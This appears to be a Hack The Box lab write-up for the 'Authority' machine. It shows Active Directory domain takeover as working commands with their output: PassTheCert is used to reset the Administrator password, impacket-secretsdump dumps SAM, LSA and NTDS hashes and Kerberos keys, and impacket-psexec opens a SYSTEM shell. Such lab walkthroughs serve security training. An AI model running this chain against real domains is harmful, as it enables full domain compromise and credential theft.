PassTheCert

┌──(kali㉿kali)-[~/…/labs/authority/ADCS/pfx]
└─$ python3 PassTheCert/Python/passthecert.py -action ldap-shell -crt administrator.pub -key administrator.pri.decrypted -domain AUTHORITY.HTB -dc-ip $IP -port 636       
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
Type help for list of commands
 
#

The -action ldap-shell flag opens up a custom LDAP session

# help
 
 add_computer computer [password] - Adds a new computer to the domain with the specified password. Requires LDAPS.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 disable_account user - Disable the user's account.
 enable_account user - Enable the user's account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 exit - Terminates this session.
 
#

While there are a lot of commands available, I will go with changing the password of a user

# change_password administrator Qwer1234
got user dn: CN=Administrator,CN=Users,DC=authority,DC=htb
attempting to set new password of: Qwer1234
Password changed successfully!

for the administrator user

Hashdump

┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ impacket-secretsdump 'administrator:Qwer1234@$IP' -target-ip $IP -dc-ip $IP       
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x31f4629800790a973f9995cec47514c6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a15217bb5af3046c87b5bb6afa7b193e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HTB\AUTHORITY$:aes256-cts-hmac-sha1-96:ec22cd5a1be00cba22bdb085dc87b01d33fa7c6d75cb7433b1baf03d5e3d5e78
HTB\AUTHORITY$:aes128-cts-hmac-sha1-96:9eb68cf803ce5d245d71d0c3494f01c6
HTB\AUTHORITY$:des-cbc-md5:b9d5dcc20e7a97f4
HTB\AUTHORITY$:plain_password_hex:12b28d718a78af2bef5cad6cd64ab7655e01b8876d7b27be22e7307a1776d26ede7dc48760bd71ae070233c4581f6398b90d8f5384a5081f4909e187baf6f47af0a80b3cbc264f5c638d0ae29503af0b8baa98fb57e83b633f88b0579021c87195dd9238ccfa8f18195c61e551f183f51bd21e189508bc45d07712053569a285d6f75c566b9ad417fefced685fa570a952641f1fd6838013bf61835fe6ac024a5e0273d1eedf8819aa00b0850e281e8d83abbf2b4edd8b42fafc8370b263e1ffb1d8edbcdca3bbe75e1f5d6dd8da560a08f5ac8d42b75a6a306c8f5b5f2e96203e935b06e05d9611b7f8be58f24cce97
HTB\AUTHORITY$:aad3b435b51404eeaad3b435b51404ee:5f2d84fb5e44ccaddb52c672b9578fcb:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd5d60027f85b1132cef2cce88a52670918252114
dpapi_userkey:0x047c1e3ad8db9d688c3f1e9ea06c8f2caf002511
[*] NL$KM 
 0000   F9 41 4F E3 80 49 A5 BD  90 2D 68 32 F7 E3 8E E7   .AO..I...-h2....
 0010   7F 2D 9B 4B CE 29 B0 E6  E0 2C 59 5A AA B7 6F FF   .-.K.)...,YZ..o.
 0020   5A 4B D6 6B DB 2A FA 1E  84 09 35 35 9F 9B 2D 11   ZK.k.*....55..-.
 0030   69 4C DE 79 44 BA E1 4B  5B BC E2 77 F4 61 AE BA   iL.yD..K[..w.a..
NL$KM:f9414fe38049a5bd902d6832f7e38ee77f2d9b4bce29b0e6e02c595aaab76fff5a4bd66bdb2afa1e840935359f9b2d11694cde7944bae14b5bbce277f461aeba
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bd6bd7fcab60ba569e3ed57c7c322908:::
svc_ldap:1601:aad3b435b51404eeaad3b435b51404ee:6839f4ed6c7e142fed7988a6c5d0c5f1:::
pe:11605:aad3b435b51404eeaad3b435b51404ee:8e4ddd3c6c2934d48495c75a68049bbc:::
AUTHORITY$:1000:aad3b435b51404eeaad3b435b51404ee:5f2d84fb5e44ccaddb52c672b9578fcb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:b0f8d5ffb7e88ea6e56131a297fac584caffd61fed505b2c1b544b21a4eda6a0
Administrator:aes128-cts-hmac-sha1-96:c2a42cca87ab4a8c4efb5d774291911c
Administrator:des-cbc-md5:43945b1cefdce331
krbtgt:aes256-cts-hmac-sha1-96:1be737545ac8663be33d970cbd7bebba2ecfc5fa4fdfef3d136f148f90bd67cb
krbtgt:aes128-cts-hmac-sha1-96:d2acc08a1029f6685f5a92329c9f3161
krbtgt:des-cbc-md5:a1457c268ca11919
svc_ldap:aes256-cts-hmac-sha1-96:3773526dd267f73ee80d3df0af96202544bd2593459fdccb4452eee7c70f3b8a
svc_ldap:aes128-cts-hmac-sha1-96:08da69b159e5209b9635961c6c587a96
svc_ldap:des-cbc-md5:01a8984920866862
pe:aes256-cts-hmac-sha1-96:8e63c9189e253ace1e2ed05c7b7402416b9dfcc1cd91b98428e69065c5faf62e
pe:aes128-cts-hmac-sha1-96:45fae4bfd3f1ed127158fa4ba78a06e3
pe:des-cbc-md5:5d1f3751c8321aae
AUTHORITY$:aes256-cts-hmac-sha1-96:ec22cd5a1be00cba22bdb085dc87b01d33fa7c6d75cb7433b1baf03d5e3d5e78
AUTHORITY$:aes128-cts-hmac-sha1-96:9eb68cf803ce5d245d71d0c3494f01c6
AUTHORITY$:des-cbc-md5:895d670dd3310bc2
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop

┌──(kali㉿kali)-[~/archive/htb/labs/authority]
└─$ impacket-psexec 'administrator:Qwer1234@$IP' -target-ip $IP -dc-ip $IP
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
[*] Requesting shares on 10.10.11.222.....
[*] Found writable share ADMIN$
[*] Uploading file kFmPkvrb.exe
[*] Opening SVCManager on 10.10.11.222.....
[*] Creating service Ghqh on 10.10.11.222.....
[*] Starting service Ghqh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4644]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
authority
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::210
   ipv6 address. . . . . . . . . . . : dead:beef::1fff:856d:2473:8cb6
   link-local ipv6 address . . . . . : fe80::7835:2a6c:98a0:6a63%8
   ipv4 address. . . . . . . . . . . : 10.10.11.222
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%8
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

Authority_Privilege_Escalation

PassTheCert

Hashdump

Shell Drop

Interactive Graph View

Table of Contents

Backlinks